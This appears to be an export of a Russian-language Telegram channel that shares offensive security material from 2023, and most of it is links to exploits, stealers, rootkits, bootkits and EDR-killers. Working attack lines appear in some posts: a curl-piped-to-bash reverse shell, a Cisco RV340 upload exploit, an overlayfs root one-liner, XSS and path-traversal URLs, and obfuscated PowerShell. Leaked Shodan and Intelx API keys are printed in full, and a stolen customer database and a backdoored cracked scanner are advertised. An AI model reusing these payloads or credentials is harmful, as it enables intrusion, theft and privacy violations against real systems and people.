2023-09-27 07:22:12 |
CVE-2023-29360Exploit for MSKSSRV.SYS driver POC exploit#lpe #win |
Images
|
2023-09-26 19:31:23 |
CVE-2023-29357Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability affected from 16.0.0 before 16.0.10399.20005 exploit |
|
2023-09-22 10:24:29 |
PhoneSploit ProТеперь бгг универсальный (что бы это ни значило)download |
Images
|
2023-09-22 10:03:52 |
curlshellreverse shell using curl *usage:*Start your listener:./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234On the remote side:curl https://curlshell:1234 | bashdownload#shell #curl |
|
2023-09-20 20:32:57 |
Elasticsearch Stack Overflow VulnerabilityCVE-2023-31419 Exploit👌 |
Images
|
2023-09-19 20:23:08 |
PDF |
Images
|
2023-09-19 11:24:25 |
fortinet-ssl-vpn-bruteforce |
Images
|
2023-09-19 06:47:57 |
мало кто знает, но на самом деле днищще у ЦРУ 11 сентября |
Images
|
2023-09-19 06:37:47 |
Ну что ? протестировали с lockBit новый бот ?Все еще в дауне)) |
Images
Images
|
2023-09-18 08:12:05 |
🤨 |
Images
|
2023-09-18 08:09:39 |
Burp Suite Plugins developmentread book#BurpSuite |
Images
|
2023-09-13 18:46:16 |
X64Hello |
|
2023-09-12 14:42:56 |
Они и |
|
2023-09-12 14:42:09 |
Гю |
|
2023-08-30 07:44:28 |
VcenterKit - тулкит для эксплоитинга и POSTэксплуатации vmware Vcenter*Сплоитов не так много, пока, но оно легко расширяемое - VcenterKit.py*download#vmware #expl #post #kit |
Images
Images
|
2023-08-29 15:27:08 |
CVE-2023-38388Mass Exploit - CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account TakeoverDork : inurl: wp-content/plugins/jupiterx-core/POC exploit |
Images
|
2023-08-29 13:39:38 |
#ЦИПсО_Talos |
Images
|
2023-08-29 12:34:12 |
oracle java*POC |
Images
|
2023-08-29 12:19:52 |
CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847*Update watchtowr-vs-junos_juniper_2023-08-25.py |
|
2023-08-29 12:18:08 |
CVE-2023-38831Understanding WinRAR Code Execution |
|
2023-08-26 06:46:15 |
Чортова МоскваСкорее б в Питер)))К расчлененочке))) |
Images
|
2023-08-25 10:45:44 |
ПриходитеДелитесь опытомКонтактами, Можно майками ))))....сами понимаете.... |
Images
|
2023-08-25 10:18:56 |
И внутрь) |
|
2023-08-25 10:18:51 |
None |
Images
|
2023-08-25 10:18:33 |
А как вы думали, эти тусы для этого и существуют, руки пожать, мосты навести, проект замутить, etc. Приходите, даже на вход, поздороваемся, пообщаемся)))) |
|
2023-08-25 10:09:26 |
Норм ребята |
|
2023-08-25 10:09:22 |
None |
Images
|
2023-08-24 13:29:39 |
None |
Images
|
2023-08-24 05:30:33 |
IIS - расшифровка данных без appcmd.exePOC |
Images
|
2023-08-23 19:35:11 |
Мир окон\мир дверей\пластмассовый мир победил - нетМИР шелловshells 2014 - 2023 |
Images
|
2023-08-23 13:37:10 |
Подготовка идёт) |
Images
Images
Images
Images
Images
|
2023-08-23 04:10:10 |
Мы ж хотели тебя через забор перекинуть, давай !!! |
Images
|
2023-08-23 03:54:25 |
Напоминаем, что завтра стартует конференция OffZoneПриходите, будет весело !#offzone #moscow #it #cybersec #2023 |
Images
|
2023-08-22 20:07:49 |
Exploitation of Openfire CVE-2023-32315Full WriteUpOpenfire-Bypass exploit |
Images
|
2023-08-22 09:21:28 |
xss.is вы там это, аккуратнее )https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1 |
|
2023-08-21 19:22:09 |
Sonicwall rce CVE-2023-34124*metasploit*use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets |
|
2023-08-21 14:41:04 |
HITCON 2023Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*Exploit#AMD |
Images
|
2023-08-21 08:49:27 |
CVE-2023-36874 уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.*POC exploit*Read - exploit for 0-day Windows Error Reporting Service bug#windows #lpe |
Images
|
2023-08-20 11:57:01 |
OWASP Top 10 - video*download |
Images
|
2023-08-20 05:02:00 |
Отслеживание интересной малвари для Linux (и UNIX).Трэкнуть#linux #malware |
Images
|
2023-08-19 12:04:36 |
CVE-2023-20073Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:Cisco RV340, RV340W, RV345, RV345P Usage:#!/usr/bin/bashTARGET="https://0.0.0.0"; \FILENAME="login.html"; \echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \echo "Access the uploaded file through the following link: $TARGET/$FILENAME"#cisco |
Images
|
2023-08-18 08:59:00 |
dir-300 еще никогда не был так опасен 😀 |
Images
|
2023-08-17 17:16:24 |
Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты? -A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 Где 4444 HoneyPot, например.#HA-HA |
Images
|
2023-08-17 16:51:34 |
CVE-2023-3079 google chrome*exploit |
|
2023-08-17 15:51:33 |
Тревожные кадры, а еще там xmprpc естьhttp://dramaalert.com/wp-includes/ |
Images
|
2023-08-17 05:09:53 |
RDP Credential Stealer*download*HowToUse#win #rdp |
Images
|
2023-08-16 13:42:29 |
Я календарь перевернуИ снова RATник в сентябре |
|
2023-08-15 13:56:36 |
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-15 07:19:41 |
Если нужно быстро сориентироваться по системным вызовам ядра Linux.Числа и параметры для различных архитектур и версий ядра.https://syscalls.mebeim.net#linux #syscalls #arch |
Images
|
2023-08-14 20:36:20 |
WPS Office RCEВерсии: WPS Office 2023 и WPS Office 2019writeUpProofOfConcept |
Images
|
2023-08-14 14:51:00 |
DllNotificationInectionИспользуя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )*WriteUp "must have"*POC |
Images
|
2023-08-14 12:51:34 |
CVE-2023-36664Ghostscript command injection vulnerability PoC exploitexploit#ghostScript #exploit |
Images
|
2023-08-13 09:49:33 |
Продолжаем публиковать материалы с DefCon 31SpamChannelПодделка писем с любого домена с помощью MailChannels (+2 миллиона доменов)Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-13 07:47:47 |
Утры |
Images
|
2023-08-12 06:16:52 |
Defcon 31 начинает приносить свои первые плодыPOC для обхода EDR в рамках злоупотребления Windows containers frameworkdownload#edr #bypass #defcon |
Images
|
2023-08-11 19:21:50 |
VED-eBPF: Kernel Exploit and Rootkit Detection using eBPF Go#linux #kernel |
Images
|
2023-08-11 11:15:42 |
SHODAN keys успевайтеOefcMxcunkm72Po71vVtX8zUN57vQtACPSKINdQe1GyxGgecYz2191H2JoS9qvgDpHHlgpFt8Ka3Stb5UlTxcaEwciOeF2QM61TvA2dNwxNxmWziZxKzR5aO9tFD00NjxTbXXOSBr0R65OcClImSwzadExoXU4tcEJV3A4Mka2wPs7P8VBCO6xcpRe27iNJumEuInz8UH1ixLGJq4oQhEiJORERVG5xclkY0ng0XMo29zEhzyw3ibQfeEBxghwPFsyeCnFndQ8TE4qAGvhm9nZLBZOBgoLKd7TeyFZ8oyLulHwYUOcSPzZ5w3cLYib61v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kikdTNGRiwYNozXIDRf5DWyGNbkdiS5m3JKkdnzf4fsYWQmGajRDn3hB0RElbUlIaquboYedPn8iDWi6GDSO6h2kz72VLt6bZ3SFQNAMUdkeqXqVOdXsTLYeatFSpZSktdbOygcaGSSq46Lg5fZiADAuFxl4OBbn7zmXAbsu1Ruj5uhTNcxGdbGNgrh9WuMS1B6nkGd8uVE4oryfUVvioprswdKGmA5InzZXYdjHDeJM36AjDfU1feBsyMJIj8XxGzDEBeU0lGqtIO6yCxVFCWC4nUVbvovtjo5 |
|
2023-08-11 04:35:02 |
malware and #exploits http://103.89.15.53/ |
Images
|
2023-08-10 07:36:12 |
АнонсLPE 0daywin 10 - 11win_srv 2012 - 2016 - 2019 - 2022 |
Images
|
2023-08-10 05:47:30 |
Вот Вам мини трик (хейт спич) про OpenVPN.Если у вас linux и прости хоспаде NetworkManager (а в нем еще и плагин для всяких ipsec\vpn\wireguard\etc) и из него не конектит до сервера OpenVPN, но при этом если запускать руками через консоль, то все отлично работает. Тогда в консоли пишем journalctl -u NetworkManagerсреди кучи логов можно grepнуть:AUTH: Received control message: AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher) Вторая ссылка гугла отправит нас в репозиторий openvpn, где белом по черному написано (см скрин), что клиент\сервер добазариться не могут чем шифровать наш траффик на госуслуги (не проплачено) и онлифанс (проплачено).И тут есть 2 пути, либо прописать в обоих конфигах нужный алгоритм шифрования, либо пойти в конфиг клиента и закоментить строку cipher.#vpn #кофе |
Images
Images
Images
|
2023-08-09 15:55:47 |
Обходим AntiMalware Scan interface в Windows 11 в 2023 году*powershell_assembly*#AMSI #win11 #яЕстьХочу |
Images
|
2023-08-09 11:42:52 |
CVE-2023-38182Microsoft Outlook 365 Пропатчено только вчераХостов много#outlook #1day |
Images
|
2023-08-09 07:27:28 |
АААААА 🤮 |
Images
|
2023-08-08 19:06:03 |
CVE-2023-34034Spring WebFlux Write-Up and POC |
Images
|
2023-08-07 11:31:30 |
CVE-2023-3269Linux kernel privilege escalation vulnerabilityexploit |
Images
|
2023-08-07 11:30:31 |
CVE-2023-3269 StackRot Linux kernel privilege escalation vulnerability Ждем ждем)) #linux #lpe |
|
2023-07-31 13:12:31 |
ога блин, счастье , что инета нет или что )))) |
|
2023-07-31 13:11:18 |
звони уже Балин))) |
|
2023-07-31 13:11:09 |
None |
Images
|
2023-07-29 17:18:39 |
CVE-2023-35078 Уязвимость удаленного доступа к API Access vulnerability обнаружена в Ivanti Endpoint Manager Mobile (EPMM)POC exploit |
Images
|
2023-07-29 09:06:30 |
Напоминаю, что в эту субботу будет митап в Санкт-Петербурге. Одевайтесь по погоде и приезжайте на митап, будет интересно! Митап пройдет 29 июля, в 12:00 в Измайловском центре, м. Технологический институт, Измайловский пр., 2 / наб. р. Фонтанки, 120 Мероприятие… |
|
2023-07-28 18:25:01 |
красивое |
Images
|
2023-07-28 17:22:57 |
Знаете, а я приду к Вам завтра ))) |
|
2023-07-28 15:18:39 |
Самый короткий exploit в мире (возможно)unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")' |
Images
|
2023-07-28 11:33:56 |
Etoro.com DataBase.com200000 строк богатых людей |
Images
|
2023-07-28 08:25:17 |
Сисадмины с праздником. Вот вам подарок )CVE-2023-35885 Cloudpanel 1-day ExploitДля версий : v2.0.0 – v2.3.0Пропатчено : 20-06-2023 (v2.3.1)*Exploit + shell#праздникъ #клоунpanel #xploet #shыll |
Images
|
2023-07-27 16:36:35 |
О, прикольно !malware traffic analysis#malware |
Images
|
2023-07-27 15:47:02 |
CVE-2023-29336Дырка в драйвере ядра Win32k и эксплуатируется при открытии специально созданного падонками успешными людьми RTF-файла. LPE до systemАналитика#windows #lpe |
|
2023-07-27 07:04:51 |
WSPCoercePoC для принудительной аутентификации с хостов Windows с использованием MS-WSP.Хост будет подключаться через SMB к хосту листенера, используя учетную запись компьютера.DOWNLOAD#windows #smb |
Images
|
2023-07-26 05:10:10 |
outlook email auth bypassdownload POC and read#outlook |
Images
|
2023-07-26 05:00:00 |
kernel-exploit-factoryLink |
Images
|
2023-07-24 11:51:42 |
Понедельники гавно) |
Images
|
2023-07-21 10:54:06 |
Любят всякие техники\админы\rootiNы\девопсы мультиплексоры типа gnu screen или tmux. Удобно красиво и небезопасно).Задавшись утром вопросом, как заставить его работать на себя (не трогая всякие bashrc и тд), путь был найден. В screen есть директива hardstatus string, которая посредством марсианского языка отрисовывает в терминале информативный статусБар (хостнейм\время\сессии и тд).Так вот, hardstatus string в качестве аргумента может принять и скрипт и линк))), ну а что в скрипте сами понимаете.Пока нашлось 2 способа, красивый марсианский и быдлоБытовой. |
Images
Images
|
2023-07-21 08:42:31 |
BurpSuite PRO version 2023.7JAVA - 18 |
|
2023-07-20 13:35:35 |
Acunetix Premium v14.2.210505179 Full Activated 2023 + BACKDOOR только для постоянных подписчиковЗабавное видео#backdoor #acunetix #резилКоторогоНеБыло |
Images
|
2023-07-20 04:26:21 |
Kevin mitnickF |
|
2023-07-19 17:09:20 |
OpenSSH RCE (forwarded ssh-agent)CVE-2023-38408Интересно#ssh |
Images
|
2023-07-19 13:44:42 |
ColdFusion XSSPOC:{{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain) |
Images
|
2023-07-18 17:27:32 |
От local admin до domain adminAV/EDR - тоже в отстое, потому что дублируется токен реального админа (если конечно запущен такой процесс)hypobrychium#windows #edr #av #admin |
Images
|
2023-07-17 16:32:20 |
#humor_or_not) |
Images
|
2023-07-17 13:33:16 |
CVE-2023-32117Google Drive Plugin, WordPress и отсутствие авторизации via REST API EndpointsPOC CURL ) |
Images
Images
|
2023-07-17 12:33:24 |
GAP#BurpSuite |
Images
|
2023-07-16 14:15:04 |
CVE-2023-20110Cisco Smart Software Manager On-Prem SQL Injection Vulnerability exploit#cisco #sql #exploit |
|
2023-07-16 08:12:03 |
HVNC for Cobalt Strike *Еще одна реализация, хотя сам протокол VNC не задействован (форк TinyNuke)покрытие:Windows Server 2022 x64Windows Server 2016 x64Windows Server 2012 R2 x64Windows Server 2008 x86Windows 7 SP1 x64Download#cobalt #hvnc |
Images
|
2023-07-15 14:09:59 |
Proxy bar в гостях у failover bar ) |
Images
|
2023-07-15 08:34:50 |
CVE-2023-37582 EXPLOITApache RocketMQ *Для теста присутствует RocketMQ environment via Docker*exploit*#apache #exploit #docker |
Images
|
2023-07-14 10:01:08 |
Пятничное#humor |
Images
|
2023-07-13 16:59:10 |
Если openVPN\wireguard не спасает (меня не спасает)то либо ipsec на свой сервер (но это муторно)заверните ВСЁ через ssh (sshuttle)одной командой:sshuttle -r root@TARGETHOST:22 0/0 -x TARGETHOST:22 --dns#ебаныйРКН |
|
2023-07-13 04:45:34 |
CVE-2023-35803 Extreme Networks/Aerohive Wireless Access PointsPOC exploit |
Images
|
2023-07-12 18:51:30 |
О, интересно, только что сгрузили BlackLotus UEFI Windows Bootkit Сорцы\панелька\манЫть#bootkit |
Images
|
2023-07-12 12:58:14 |
SatIntelИзвлечение спутниковой телеметрии, получение орбитальных прогнозов и анализ TLE.Круто !!! Звучит как новое хоббиGet |
Images
|
2023-07-12 09:43:26 |
supermanKill The Protected Processdownload |
|
2023-07-12 07:31:20 |
Кроба книгу написал)))#humor |
Images
|
2023-07-11 11:02:19 |
CVE-2023-24489Citrix ShareFile RCE🔥POC exploit + разбор#citrix |
Images
|
2023-07-11 05:50:50 |
Доброе утро, включаем рабочие машинки ! ) |
Images
|
2023-07-10 20:48:28 |
CVE-2023-31998exploit for Ubiquiti EdgeRouterРазбор уязвимости и POC exploit тут |
Images
|
2023-07-10 07:29:59 |
NimBlackoutЕще один киллер AV/EDRdownload |
|
2023-07-10 07:15:35 |
Оу, какой стиллер))мефедр Phemedrone Stealer Приятный кач, демократические цены)))download#stealer |
Images
|
2023-07-09 17:38:43 |
hvextРасширение Windbg, реализующее команды, полезные для изучения Hyper-V на процессорах Intel.Полезно для ресёрчеров.Да, была использована буква Ёdownload#hyper-v #windgb |
|
2023-07-08 17:46:31 |
Нужна небольшая помощь !есть у кого fucking veeamнужны:Veeam.Backup.Common.dllVeeam.Backup.Interaction.MountService.dllVeeam.Backup.Model.dllа то сплоит не собирается, а качать не хочется.пришлите на почту proxy-bar@proton.me#help |
|
2023-07-08 17:01:11 |
TakeMyRDP 2.0 Обновленная версия кейлогера, предназначенная для процессов, связанных с протоколом удаленного рабочего стола (RDP). Он использует низкоуровневую перехватчик ввода с клавиатуры, что позволяет записывать нажатия клавиш в определенных контекстах (например, в mstsc.exe и CredentialUIBroker.exe).download#rdp |
Images
|
2023-07-08 10:31:10 |
humorsad, but true |
Images
|
2023-07-08 08:33:09 |
Manjaro LPE 0day root LPE for latest Manjaro distro, tested on embedded ARM and x86_64exploit#arch #manjaro #lpe |
Images
|
2023-07-08 07:09:09 |
Рубрика "забавное"http://copy.sh/v86/?profile=windows98#win98 #win2000 |
Images
|
2023-07-07 14:50:13 |
CVE-2023-3269StackRot Linux kernel privilege escalation vulnerabilityЖдем ждем))#linux #lpe |
|
2023-07-07 08:38:05 |
CVE-2023-2868Barracuda ESG Command Injection*Usage:ruby poc_cve_2023_2868.rb <TARGET_IP>*POC exploit |
|
2023-07-07 08:15:04 |
Cisco CCNA 200-301 Exam Complete Course with practical labslink#cisco #ccna |
|
2023-07-01 05:24:14 |
#Рубрика - "смешное"*NoMoreCookiesStealers/RATs Tested:AsyncRATQuasar RATStormKittyFireFox-ThiefDcRatXWorm RAT*Link |
Images
|
2023-07-01 04:46:41 |
С добрый утром ! 🙃 |
|
2023-06-30 18:55:12 |
Ребят, тут Windows Common Log File System протёк Есть патч от апреля, так что не 0-DayCVE-2023-28252POC exploit #windows #lpe |
Images
|
2023-06-30 14:06:05 |
Decrypt FortiManager configuration secrets #fortinet #dec |
Images
|
2023-06-30 07:50:39 |
CVE-2023-2982WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass exploit🔥🔥🔥 |
Images
|
2023-06-29 13:22:32 |
CVE-2023-3338 Linux kernel LPE exploitпока не дорого)#linux #lpe |
Images
|
2023-06-28 20:42:49 |
CVE-2023-26258RCEArcServe UDP BackupclickME |
Images
|
2023-06-27 12:12:58 |
CVE-2023-35844directory traversalexpl |
Images
|
2023-06-27 06:21:22 |
Shellcode Execution via EnumSystemLocalAread |
Images
|
2023-06-27 05:08:16 |
winampcve#humor |
Images
|
2023-06-26 19:48:38 |
DIY Linux Kernel Rootkit DetectionХорошая статья для понимания процессов которые влекут за собой руткиты и как их ловить (или чего еще))))Ловить будет руткит reveng_rtkit с помощью osquery-defense-kit#rootkit #linux |
Images
|
2023-06-26 19:39:54 |
Exploits targeting Symfonyсвят свят свят |
Images
|
2023-06-26 16:43:22 |
CVE-2023-32784 KeePass 2.X Master Password Dumper Буфер обмена подвел )) POC |
Images
|
2023-06-25 07:58:13 |
Когда твоя стирально\отжимательная машина пошла в ransom |
Images
|
2023-06-25 07:54:02 |
Заражение открытых ключей SSH бэкдорами(ну не только, в целом любую херню можно запускать, так как шелл, а сторогой валидации строки нет, в процем ее и нет в MTS банке)))read#ssh |
Images
|
2023-06-25 07:38:33 |
CVE-2023-27372SPIP (before 4.2.1)RCEEXploit#spip #rce |
Images
|
2023-06-17 06:54:20 |
Tor site deanon by EtagА можно просто отключить кэш Etag )))Кипишь#tor #deanon |
Images
|
2023-06-16 15:14:30 |
Intelx Admin API Keyvar API_URL = 'https://2.intelx.io/';var API_KEY = '62fb1e77-0309-4893-80c8-a817c1e76917'; |
|
2023-06-16 14:58:41 |
Продадим ультра софт, да, не новый, но классика )для покупателей proxy-bar@proton.me |
Images
|
2023-06-16 13:27:59 |
CVE-2023-1829LPE exploitTested on Ubuntu22.04 -_ -#linux #exploit |
|
2023-06-16 09:41:30 |
#РукаЛицо📗Вопрос блокировки в РФ мессенджера WhatsApp не обсуждается, предпосылок нет — Шадаев. 🌚Обсуждается, ведется работа - так как через это дырявое вражеское приложение идет документооборот всех силовых структур России и не только силовых!!! - Ситников.😎Хуле вы разнылись, внедряй повелевай VipNet hw-1000 и защищенная почта из рук в руки, голосовые через ТА-57 ))) - Администрация Proxy bar#Пятница |
|
2023-06-15 17:58:33 |
Banshee rootkitWindows x64 Kernel Driver/RootkitЭкспериментальный !!!*download#rootkit #win |
Images
|
2023-06-15 07:23:59 |
Rusty BootkitWindows UEFI Bootkit in Rust (Codename: RedLotus)download#bootkit #win #rust |
Images
|
2023-06-14 20:10:10 |
anonfiles searchby гугле ) |
Images
|
2023-06-13 16:12:00 |
CVE-2023-20887 VMWare vRealize Network Insight Pre-Authenticated RCE exploit#vmware #rce #exploit |
|
2023-06-13 05:26:23 |
Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 download 11.5 GB |
Images
|
2023-06-13 05:22:10 |
CVE-2023-2008 Бага в драйвере udmabuf ядра Linux (исправлено в версии 5.19-rc4.)impact такое себе, нужен доступ к /dev/udmabuf от kvm юзера*Analyzing and exploitingexploit#linux #exploit |
Images
|
2023-06-12 19:52:18 |
когда логика привела к 6 ошибкам )#humor |
Images
|
2023-06-12 12:54:29 |
CVE-2023-34362 MOVEitexploit + crt + pem + pubUsage:python CVE-2023-34362.py https://127.0.0.1[*] Getting sysadmin access token[*] Got access token[*] Getting FolderID[*] Got FolderID: 963611079[*] Starting file upload[*] Got FileID: 965943963[*] Injecting the payload[*] Payload injected[*] Triggering payload via resume call[+] Triggered the payload![*] Deleting uploaded file |
|
2023-06-12 12:45:17 |
MySQL Fake Serverdownload+docker |
Images
|
2023-06-12 07:50:14 |
Не обновляйтесь до новой версии Debian 12critical bugsОхереть релиз))#debian #LoL 🧐 |
Images
|
2023-06-12 06:26:20 |
CVE-2023-25157GeoServer SQL Injection - POC exploitGeoServer SQL Injection - check vuln script |
Images
|
2023-06-12 06:03:31 |
SharpTerminatorПоубивать процессы AV/EDR с помощью драйвера ядра download#edr |
Images
|
2023-06-08 08:01:22 |
libssh CVE-2023-2283POC exploitusage:~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub#ssh |
Images
|
2023-06-08 07:46:09 |
DropSpawnCobaltStrike BOF для создания маяков с использованием DLL Application Directory Hijackingdownload |
Images
|
2023-06-08 07:41:08 |
SignatureGateБоевая версия HellsGate, обходящая AV/EDR/EPP путем злоупотребления опциональным исправлением CVE-2013-3900download#bypass #edr |
Images
|
2023-06-03 14:25:01 |
Создаем и обфусцируем DLL которая отключит AMSI и ETWreadMEdownload LightsOut |
Images
|
2023-06-03 08:27:25 |
Прикольно, но зачем последний октет икситьbrute.fail#bruteforce |
|
2023-06-02 14:30:06 |
CVE-2022-20421Bad Spin: Android Binder Privilege Escalation Exploitdownload#android |
|
2023-06-01 15:58:34 |
Какой боевойhXXp://34.101.154.50/ |
Images
|
2023-06-01 14:34:28 |
Rootkit INTRACTABLEGIRAFFEproof of concept*Из прикольного:Использует скрытую виртуальную файловую систему (VFS) для хранения файлов за пределами стандартной файловой системы Windows. При чем как энергозависимую, так и энергонезависимую скрытую VFS.Keylogger - для демонстрации*download#windows #rootkit |
Images
|
2023-06-01 13:09:08 |
CVE-2023-23638Apache-DubboPOC exploit#apache |
Images
Images
|
2023-06-01 12:11:42 |
придумайте слоган на фильма )) |
Images
|
2023-05-31 14:44:47 |
так и живем, на xss запрещают, на экспосе разрешают.Пронаблюдаем ! |
Images
|
2023-05-31 06:31:25 |
просто прекрасно |
Images
|
2023-05-31 06:26:05 |
Data Structures & Algorithms Essentials using C++ (2022)7.3 GBLink |
|
2023-05-30 16:02:09 |
raid forum это конечно хорошоа вот настоящий слив !есть ли тут связь ?)😝 |
Images
|
2023-05-30 14:31:41 |
show time ))) |
|
2023-05-30 07:45:24 |
Министерство обороны США рекомендует:DevSecOps Fundamentals Guidebook |
Images
|
2023-05-30 07:31:01 |
CVE-2023-33246*Apache RocketMQ*readPOC |
|
2023-05-29 20:30:00 |
Emoji Shellcoding 😋Улыбаемся и бэкдоримRISC-V#shellcodes #smile |
Images
|
2023-05-29 12:35:50 |
RansomchatsСборка чатов\переговоров с рансомварщиками )#ransom |
Images
|
2023-05-29 06:48:14 |
kill anti-malware protected processes (BYOVD) |
Images
|
2023-05-29 06:23:51 |
CVE-2023-32315openfire xmppserver Administration Console authentication bypasspath traversal - только в UTF-16 http://localhost:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jspА кто вообще в здравом уме, после инсталла держит папку setup на сервере ? read#jabber |
|
2023-05-28 16:22:36 |
car hacking courselink |
Images
|
2023-05-28 06:43:17 |
CVE-2023-2825GitLab - Community Edition\Enterprise EditionУязвимость позволяет неавторизованным пользователям читать произвольные файлы через ошибку обхода пути.POC Exploit#gitlab |
Images
|
2023-05-21 19:35:47 |
Слив темы инжектов, chromium расширение для работы с ботамиФункционал: Инжект скриптов в веб-страницы Сбор cookies в формате .json Отправление PUSH уведомлений Создание скрытого скриншота текущего экрана браузера Просмотр всех установленных расширений и их включение/выключение Получение актуального URL на котором находится бот Выгрузка истории браузера в формате .json Использование IP бота и его куки (reverse proxy)ссылка https://xss.is/threads/80558/Стоимость продукта на форуме : 5.000$ |
|
2023-05-21 06:43:17 |
SSH-HarvesterПолучаем пароли ssh пользователей в открытом виде.Ну да ну да, еще пару лет назад была статья, что ssh сервер при авторизации порождает 2 процесса, на одном из которых пасс катится в открытом виде, собственно на этом моменте его и вытягивают.В общем поставили скрипт, рыбалка идет сама собойDownload |
Images
|
2023-05-20 19:04:51 |
Еще раз о linux persistenceНичего нового, но красиво и уже готовые скриптыread#linux #backdoors #oldbutnotuseless |
Images
|
2023-05-20 12:05:29 |
Тут LockBit (ransomware запрещено на территории квартиры) взяли, да и перевели "Руководство пользователя по Cobalt Strike'у 4.7" на русский язык.К чему это все, думайте сами)))) |
|
2023-05-19 17:27:49 |
Пятничное |
Images
|
2023-05-19 14:44:48 |
DevSecOps guidesПочитать |
|
2023-05-19 11:09:42 |
CVE-2023-21554win message подъехалиPOC#win #poc |
|
2023-05-19 07:29:51 |
ChatGPT как C&C, Хех)#GPT #C2 |
Images
|
2023-05-18 10:34:14 |
UAC_Bypass2.c#bypass |
|
2023-05-17 21:19:22 |
AntiRansomware Linux Kernel Module Это успех, то есть, для защиты от рансома, был написан фактически rootkit с перехватом sys_renameА вот затея с суффиксами плохая, всегда можно генерить на основе железа и например хоть аптайма уникальный суффиксlink |
Images
|
2023-05-17 16:04:40 |
Занятный PowerShell обфускатор${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;};${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;};${"}="["+"$(@{})"[${)}]+"$(@{})"["${+}${|}"]+"$(@{})"["${@}${=}"]+"$?"[${+}]+"]";${;}="".("$(@{})"["${+}${[}"]+"$(@{})"["${+}${(}"]+"$(@{})"[${=}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]);${;}="$(@{})"["${+}${[}"]+"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${[}+${"}${)}${@}+${"}${+}${=}${+}+${"}${+}${=}${&}+${"}${+}${=}${&}+${"}${+}${+}${+}+${"}${[}${[}+${"}${.}${@}+${"}${+}${+}${|}+${"}${+}${+}${+}+${"}${+}${+}${[}+${"}${+}${=}${&}+${"}${+}${=}${=}+${"}${.}${.}+${"}${.}${[}|${;}"|&${;}; есть триалка#poweshell |
Images
|
2023-05-17 15:37:00 |
CVE-2023-32243wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationexploit#wordpress #plugin |
|
2023-05-17 15:30:49 |
SCCM/MECMЕще один способActive Directory Spotlight: Attacking Microsoft's Configuration Manager#sccm #ad |
Images
|
2023-05-17 11:58:44 |
Exploit NotesВ целом ничего нового, но компиляция красиваяread#pentest |
|
2023-05-16 20:33:46 |
CVE-2023-32233exploit#Linux #LPE |
|
2023-05-16 19:24:27 |
From DA to EA with ESC5или уязвимый контроль доступа к объектам PKIread and run #AD #PKI |
Images
|
2023-05-13 18:44:08 |
Прикольно |
|
2023-05-12 20:56:55 |
Тушу |
|
2023-05-12 20:26:06 |
Завтра |
|
2023-05-12 17:56:00 |
None |
Images
|
